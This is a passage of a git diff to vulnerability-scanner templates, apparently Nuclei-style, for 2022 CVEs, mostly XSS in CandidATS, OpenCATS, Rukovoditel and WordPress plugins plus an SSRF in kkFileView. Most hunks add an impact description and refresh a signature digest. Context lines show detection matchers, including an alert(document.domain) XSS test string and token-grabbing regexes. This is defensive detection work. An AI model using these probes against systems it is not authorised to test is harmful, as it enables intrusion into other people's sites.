index 041b9953dc..e9ba3aa0d2 100644
--- a/http/cves/2022/CVE-2022-42095.yaml
+++ b/http/cves/2022/CVE-2022-42095.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Page content.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Upgrade to a patched version of Backdrop CMS or apply the necessary security patches provided by the vendor.
   reference:
@@ -82,4 +84,4 @@ http:
         regex:
           - 'name="form_token" value="(.*)"'
         internal: true
-# digest: 4b0a00483046022100a62e40cc115b7c6b3d3a4044f86b1c8af4156aeff8f605e1c44ca5dd7d37373d022100fc3e27353bdd3a5b007899e6c497ecb82b65889d437a35e5f3513e9737b00cd4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022045cdf84772b906273a876685b7301c0a7ad47833959db00fb34b35d406bb5add022100f4d7a7c50bbd8f64174846394cd06b64883f4dad5959e6f363f58c2c264c45aa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-4260.yaml b/http/cves/2022/CVE-2022-4260.yaml
index 7dda78ddd3..9bfac3a914 100644
--- a/http/cves/2022/CVE-2022-4260.yaml
+++ b/http/cves/2022/CVE-2022-4260.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress WP-Ban plugin before 1.69.1 contains a stored cross-site scripting vulnerability. The plugin does not sanitize and escape some of its settings, which can allow high-privilege users to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be exploited even when the unfiltered_html capability is disallowed, for example in multisite setup.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or further compromise of the affected system.
   remediation: Fixed in version 1.69.1
   reference:
     - https://wpscan.com/vulnerability/d0cf24be-df87-4e1f-aae7-e9684c88e7db
@@ -68,4 +70,4 @@ http:
           - '_wpnonce=([0-9a-z]+)'
         internal: true
         part: body
-# digest: 4a0a00473045022100e6d9f856219f5942356c0eff6929d690ef2dce80b2c97f373b8babfb8894850e022022363ed5b49d0b8249a5519a0761d4cf86e5843d8b25fc66cbda3f7ea12e695f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206b664e17e7ba72b29ad1eecccba195fa5cdcbeaa4b8b433d51e208dbb85149dd022071613d021bbd54dd144a912ecf2e721c6f650b273af68280a606fa0e0e77b1b3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-42746.yaml b/http/cves/2022/CVE-2022-42746.yaml
index d154d2a7b5..1ca9f1f3a9 100644
--- a/http/cves/2022/CVE-2022-42746.yaml
+++ b/http/cves/2022/CVE-2022-42746.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     CandidATS 3.0.0 contains a cross-site scripting vulnerability via the indexFile parameter of the ajax.php resource.  An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     To mitigate this vulnerability, it is recommended to apply the latest security patch or upgrade to a non-vulnerable version of CandidATS.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 404
-# digest: 490a0046304402205ed45a626a69204636500432b4fd93640811eab0a7f71984d0b7fe4b1154c2620220040e7c1f984805563a10f594ad5fa9a710f629f3a1cf73fa468965b7741459c2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f899f8c3bb0676bb4c4453dcb890c2cefbdb54f998c846bb8f4f2d881d67885202200c14746bb8363f2e0b4a5dc48b4b54ff2d90c6339448661face30e07d9d26455:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-42747.yaml b/http/cves/2022/CVE-2022-42747.yaml
index 80bafe92fe..4dd01b6499 100644
--- a/http/cves/2022/CVE-2022-42747.yaml
+++ b/http/cves/2022/CVE-2022-42747.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     CandidATS 3.0.0 contains a cross-site scripting vulnerability via the sortBy parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the application.
   remediation: |
     To mitigate this vulnerability, it is recommended to apply the latest security patch or upgrade to a non-vulnerable version of CandidATS.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 404
-# digest: 4b0a00483046022100b9dc67490c31104460d85a3890514f70d1b37703e82010bd832ab20dcce72bb9022100bfbe75855aa3f096acc06cc8ea0dc62c07cc4a037a255100693ded4f172659aa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100cb397f1b7dfe847d369f4875c9c24936d5464a3809f397a7c53a48949d86b88e0221008e8083f467b6e9c1c821138d69e067786ebb4e69b9201ce318677e5b05a3cc58:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-42748.yaml b/http/cves/2022/CVE-2022-42748.yaml
index eea30324ac..0721eb2d8e 100644
--- a/http/cves/2022/CVE-2022-42748.yaml
+++ b/http/cves/2022/CVE-2022-42748.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     CandidATS 3.0.0 contains a cross-site scripting vulnerability via the sortDirection parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 404
-# digest: 4a0a0047304502210094ab604be34d1d799edcbe780058679d75239a2f5434c7f8c4536ec6ec126c0302202aed50ebd4b32c5d430755303b4efa410a1c12e26244bc476916b25313cced14:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100cdc747aba9b497a02f557e477ec3770b0566e9d75c21b5096c090b006e296d1302205141ad9721f52796d9f7d97228b8e178e2623b2f48c08af80bdd26f46e6ae1c5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-42749.yaml b/http/cves/2022/CVE-2022-42749.yaml
index 6254cb4935..e87876a15c 100644
--- a/http/cves/2022/CVE-2022-42749.yaml
+++ b/http/cves/2022/CVE-2022-42749.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     CandidATS 3.0.0 contains a cross-site scripting vulnerability via the page parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     To mitigate this vulnerability, it is recommended to apply the latest security patch or upgrade to a non-vulnerable version of CandidATS.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 404
-# digest: 4a0a004730450220682c7fe26edd5d151362b8011b9987b3c1e94cf22cf7f6f76b83cf8811712993022100fad503d7cfc7077615c2eb6bef8eff82c37dca08a2c34d1d3dfa949fab1d5cc1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022013325697b9b2461072c0ff8a956902ab1ba819814d0614bfbf46f4bf5c7e9a09022100845a28ec3abf1e0d1cf89d9d6455ea93f7c1e6350d7cee3450e0aa662ed01bbe:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-4295.yaml b/http/cves/2022/CVE-2022-4295.yaml
index 27eecc6ea2..45b06f22e4 100644
--- a/http/cves/2022/CVE-2022-4295.yaml
+++ b/http/cves/2022/CVE-2022-4295.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     The Show All Comments WordPress plugin before 7.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of the Show all comments plugin (7.0.1) or apply the vendor-supplied patch to fix the vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
           - 'contains(body, "<script>alert(document.domain)</script>")'
           - 'contains(body, "Select </option>")'
         condition: and
-# digest: 490a00463044022035ef90b6ec3ba675b99d5d7c60e498afdab09f0e82fd1cbc5bf5ff17cb34e8b302206a14ca6c7c39686c3d0d3674a5b1aa57e55c134085cd73577ae5201a67d17205:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ac1adf088a1b4fbecdcca1e38f02eb37d8538115ce86d8751420466b602af0bf02200417d9e4725d20e6018a22ef5c4ea307cbd96b4c13eb597e54878ebae1dc70af:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-4301.yaml b/http/cves/2022/CVE-2022-4301.yaml
index b7eea94441..910235349c 100644
--- a/http/cves/2022/CVE-2022-4301.yaml
+++ b/http/cves/2022/CVE-2022-4301.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Sunshine Photo Cart plugin before 2.9.15 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: Fixed in version 2.9.15.
   reference:
     - https://wpscan.com/vulnerability/a8dca528-fb70-44f3-8149-21385039179d
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100857820fff6a98796b62fe325a0e29524daf85e70c7d58f464eec90be9241f2110220663447af056ee693baaafbd7cdd05f02766c21892d9891ac86a94d5cc9531d7d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022025bb3d7d046bd2b35a6f846c4285621aad78c5aa696282a13e6128e2b2c5479c02205365f4467312acc2517654f765e586e3ff9cccc08954c507e7c5f0797014c5ad:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-43014.yaml b/http/cves/2022/CVE-2022-43014.yaml
index bf7dd4b2ec..162ab2f9b0 100644
--- a/http/cves/2022/CVE-2022-43014.yaml
+++ b/http/cves/2022/CVE-2022-43014.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the joborderID parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to a patched version of OpenCATS or apply the necessary security patches provided by the vendor.
   reference:
@@ -56,4 +58,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100f5a4f63d08cb474cae5721e37a91815b6902f244d4d9bdb8ad4bc1793d9dbb28022036a238541aecd522f354dfe9806c754c2e9683e1af83652d7ed1385fa2ecb2d2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022008b637b3c183a1e42ab74f62ec9868c36d292f242c06d928f19749d4ae35a621022031e330104a71d0a5c0ae458983a402b4ba1141f529c828b2b924829a5375175d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-43015.yaml b/http/cves/2022/CVE-2022-43015.yaml
index 55ed93a75f..377f6fd4e4 100644
--- a/http/cves/2022/CVE-2022-43015.yaml
+++ b/http/cves/2022/CVE-2022-43015.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the entriesPerPage parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses this issue.
   reference:
@@ -56,4 +58,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402201ca0f3454d5bd282e555b3f35d4eb613a9811b48528498d3ecfeb531690b375602203903d258bf5670f9463bdaa91016a777b4b26a150712aa697049bb36189249e2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206d95095ec5c492cbbee01b066f00b7e03ba408a1a53b32bbd6b81961e7269b6d022100b9c37eaaa980e0d5efa0c0a7bc2153a8b82dc1863362ae573cafa6fa68814766:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-43016.yaml b/http/cves/2022/CVE-2022-43016.yaml
index 45fc0f5179..0fcbe81faf 100644
--- a/http/cves/2022/CVE-2022-43016.yaml
+++ b/http/cves/2022/CVE-2022-43016.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the callback component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability.
   reference:
@@ -56,4 +58,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100bf84817c4205a034b41414e8d99368b49fb4d9920ade066704a429d074e3291802201d488f652907d975a298dc910a58af40fc8fb602ddc2e35264c556a5f10ad898:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204b393dccdfb8ccfa35bff37ea6b3598bbfbacf2180a75f7606fd771dc769d62a022100f8f726066062507cf7497f867c41d0c857e3c1c96e7ebaadd7690cc4bb9f845a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-43017.yaml b/http/cves/2022/CVE-2022-43017.yaml
index 737f8e5489..3d11d5f4b8 100644
--- a/http/cves/2022/CVE-2022-43017.yaml
+++ b/http/cves/2022/CVE-2022-43017.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the indexFile component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses this issue.
   reference:
@@ -56,4 +58,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402200325e6540327c43a0be064f0e6916001692d222d61ce6d3b4c38a185033a44300220554a1c19d9e46bdba839db1b0f289b705fc32bbc8b6ebfa0b37d55a0ea583ff8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022062275700bf39ff91f3121ec337687e783943a3323aade002a14e839a55b5274e02206d56972d6824421560ef4091b4d897d8a56cd5d38b88a9e452a1991fe2eea7b0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-4306.yaml b/http/cves/2022/CVE-2022-4306.yaml
index f8098fe75f..82197bdaa1 100644
--- a/http/cves/2022/CVE-2022-4306.yaml
+++ b/http/cves/2022/CVE-2022-4306.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Panda Pods Repeater Field before 1.5.4 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. This can be leveraged against a user who has at least Contributor permission. An attacker can also steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
   remediation: Fixed in version 1.5.4.
   reference:
     - https://wpscan.com/vulnerability/18d7f9af-7267-4723-9d6f-05b895c94dbe
@@ -45,4 +47,4 @@ http:
           - 'contains(body_2, "alert(document.domain)")'
           - 'contains(body_2, "panda-repeater-add-new")'
         condition: and
-# digest: 4a0a0047304502202f0feef0bcdbd5fa308fd1907fe90b56539fe7f6085ef5c50b71499e256cfad6022100971ef2c8e75ff0294df53cb0ff91d1dfac376ee22cb6c471128654a68cfd552e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d803443400ecdcf4c177c32664ca622e855b0e453ec583536f4960e6deba89250221008690d9bd1f4242de86e15bc4806abcbcba68a9a8992727c6332547131ffe64e1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-43140.yaml b/http/cves/2022/CVE-2022-43140.yaml
index 772a4142c2..0df0bdf39f 100644
--- a/http/cves/2022/CVE-2022-43140.yaml
+++ b/http/cves/2022/CVE-2022-43140.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     kkFileView 4.1.0 is susceptible to server-side request forgery via the component cn.keking.web.controller.OnlinePreviewController#getCorsFile. An attacker can force the application to make arbitrary requests via injection of crafted URLs into the url parameter and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access to internal resources, potential data leakage, and further attacks on the server.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the SSRF vulnerability in kkFileView 4.1.0.
   reference:
@@ -38,4 +40,4 @@ http:
         part: body
         words:
           - "<h1> Interactsh Server </h1>"
-# digest: 4a0a004730450221009be9aaba759ea1355e232340ce2c0256595dd10afa894a936d6ca69a0627e6bf022059aacd709dc5c6bf6aeebfa25f676ee06ce934a16b8881bac79b13c7584173c6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008ec1b6d6752e20bb6bbb4f04569577901ac181d3636ee087ff942524c9c8c7f20220770c392384bfff0760312ee7459e97be8bcad46e476f451b255047d442d21fc1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-43164.yaml b/http/cves/2022/CVE-2022-43164.yaml
index 77fa1cc184..ee3778c389 100644
--- a/http/cves/2022/CVE-2022-43164.yaml
+++ b/http/cves/2022/CVE-2022-43164.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add".
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.
   remediation: |
     Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability.
   reference:
@@ -63,4 +65,4 @@ http:
         regex:
           - 'id="form_session_token" value="(.*)" type="hidden"'
         internal: true
-# digest: 4a0a00473045022001e7477aaf26011c17c6ca35dc7d2c913bd522b73ed446fcdc2d168dccff187a022100bb4bf8430d64d1e1ba2b2ee6faee4dfccafc2b6bc059c8765078bb67b0e7bc53:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d81ba529bc742720f9885b426a8c171ffae56913d2eb395e583b8efae9874e24022100d1117a8d4d41eef8777315ca99ff58fde94417bcfdc2b4e964b4598bbcc6211e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-43165.yaml b/http/cves/2022/CVE-2022-43165.yaml
index def2c34e4e..a3c22bab87 100644
--- a/http/cves/2022/CVE-2022-43165.yaml
+++ b/http/cves/2022/CVE-2022-43165.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     A stored cross-site scripting (XSS) vulnerability in the Global Variables feature (/index.php?module=global_vars/vars) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Value parameter after clicking "Create".
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.
   remediation: |
     Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability.
   reference:
@@ -64,4 +66,4 @@ http:
         regex:
           - 'id="form_session_token" value="(.*)" type="hidden"'
         internal: true
-# digest: 4a0a00473045022100a495e6a1921d1bf77f95e0c19f23864abb7ac912e58eba0bad86d3594f0df80202200d32e6a04191177a5ea9d165d70ad199361a41a1938657a297bf67691042fc95:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022007c323902a8b713744d2597fcf66a19f41e1568c06679a95c2feb7f78c8e8ea802201b58549b2b0bec74bc2e01ebf95bd60f1d71a795165b1fa4d32d73bdba5e7db8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-43166.yaml b/http/cves/2022/CVE-2022-43166.yaml
index 4bef865551..ecac95b2d4 100644
--- a/http/cves/2022/CVE-2022-43166.yaml
+++ b/http/cves/2022/CVE-2022-43166.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     A stored cross-site scripting (XSS) vulnerability in the Global Entities feature (/index.php?module=entities/entities) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add New Entity".
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.
   remediation: |
     Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability.
   reference:
@@ -63,4 +65,4 @@ http:
         regex:
           - 'id="form_session_token" value="(.*)" type="hidden"'
         internal: true
-# digest: 490a00463044022003b43bf0dbfed9a30feed0bb000862117eeb7fc2db17d39e89f0daec4a0b52ff02205e427494cb30e2b3789c579b1f3a35a852dbc9f8d4420dadbef6bd76d346f582:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d0574602b896f65dc5b2c1a655577a68666b407e7c6a63d48a684fdfe5547682022100f20a42ebb906532da7fe59e824fbd590d74b4edf936d6fb73bc25e9a6ccf7bd1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-43167.yaml b/http/cves/2022/CVE-2022-43167.yaml
index cd9c5c56fa..8f82ba899f 100644
--- a/http/cves/2022/CVE-2022-43167.yaml
+++ b/http/cves/2022/CVE-2022-43167.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     A stored cross-site scripting (XSS) vulnerability in the Users Alerts feature (/index.php?module=users_alerts/users_alerts) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking "Add".
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.
   remediation: |
     Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability.
   reference:
@@ -63,4 +65,4 @@ http:
         regex:
           - 'id="form_session_token" value="(.*)" type="hidden"'
         internal: true
-# digest: 490a0046304402203f2cc3d68d12e3963999944125ca98c5cd4e1a848cb8fc241fa0dca39073863c02205d3e3c65c07caac968dedc05a5ac5cd69510ef5a979b46b4de5c9fa90d96b329:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008e9d7f607a43e10bfbe82154be194e819864d06c2e9f9cc35cfcaeb1e3d5bec8022100db3585b6fdb6667ec3c9c864d7e9e653f988e52b55d9c566e3e4f58fa3ff594b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-43169.yaml b/http/cves/2022/CVE-2022-43169.yaml
index a316c6dd63..74de24b17e 100644
--- a/http/cves/2022/CVE-2022-43169.yaml
+++ b/http/cves/2022/CVE-2022-43169.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     A stored cross-site scripting (XSS) vulnerability in the Users Access Groups feature (/index.php?module=users_groups/users_groups) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add New Group".
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.
   remediation: |
     Upgrade Rukovoditel to a version higher than 3.2.1 or apply the necessary patches provided by the vendor to mitigate the XSS vulnerability.
   reference:
@@ -63,4 +65,4 @@ http:
         regex:
           - 'id="form_session_token" value="(.*)" type="hidden"'
         internal: true
-# digest: 4a0a004730450220281dbf60726b0c7dd0400a537bed3bd727413e84073ddb963af6180f0514248102210095d6c81377edb818528079e3a481dd3af83e9d7babd0b2b70c5cc587d456f8a1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022038daffe7d757b75187ef57602f7aab68e239d28bb18af8a845a97e16ddea89ee022100c607954edd8a7dc594d58a21db6d352bf0fd311a87af268634a864f2cc002ae3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-43170.yaml b/http/cves/2022/CVE-2022-43170.yaml
index 699e777d2c..7d519e666a 100644
--- a/http/cves/2022/CVE-2022-43170.yaml
+++ b/http/cves/2022/CVE-2022-43170.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     A stored cross-site scripting (XSS) vulnerability in the Dashboard Configuration feature (index.php?module=dashboard_configure/index) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking "Add info block".
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.
   remediation: |
     Upgrade Rukovoditel to version 3.2.2 or later to mitigate the XSS vulnerability.
   reference:
@@ -63,4 +65,4 @@ http:
         regex:
           - 'id="form_session_token" value="(.*)" type="hidden"'
         internal: true
-# digest: 4a0a00473045022100a912169a331107e35078cc1b8834a37618b63eb3690de10dee78bc2bb60c7ff5022058067bb8d6bd80b0e8d72d4edeff0cd6de7850fb2cce12186d9e62d50ffa6048:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100cf67ed8ce2d956a8fcc6009605572bb04ad7118d02ee2bf5807fc17fd77202ca02201cf91f5fee6cc1c239a597f1fe3fd6f98c5dfc11d8ef9df99c54b7c7e1e6caf8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-4320.yaml b/http/cves/2022/CVE-2022-4320.yaml
index 04dc2500b3..2c29ee8b27 100644
--- a/http/cves/2022/CVE-2022-4320.yaml
+++ b/http/cves/2022/CVE-2022-4320.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Events Calendar plugin before 1.4.5 contains multiple cross-site scripting vulnerabilities. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be used against both unauthenticated and authenticated users.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.
   remediation: Fixed in version 1.4.5.
   reference:
     - https://wpscan.com/vulnerability/f1244c57-d886-4a6e-8cdb-18404e8c153c
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c8a196e8d8519e815a1ff4591443f49acd7bfde34c79a20b5bbaffbad2577d6302202a2dfea01d8f1cfc6cdff20fc4439530f0b24ab88df396342d53cf0863cb4a73:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210095eac400fa383c08110105d22621aa69e43c2e0346bd6a0b885d9d9bc07b537302206201343ee80c65898c6dfe04ffe5787009a7f67d6d4c76d79a510cea64f143d1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-4321.yaml b/http/cves/2022/CVE-2022-4321.yaml
index 0f32f092ea..fac5c18b51 100644
--- a/http/cves/2022/CVE-2022-4321.yaml
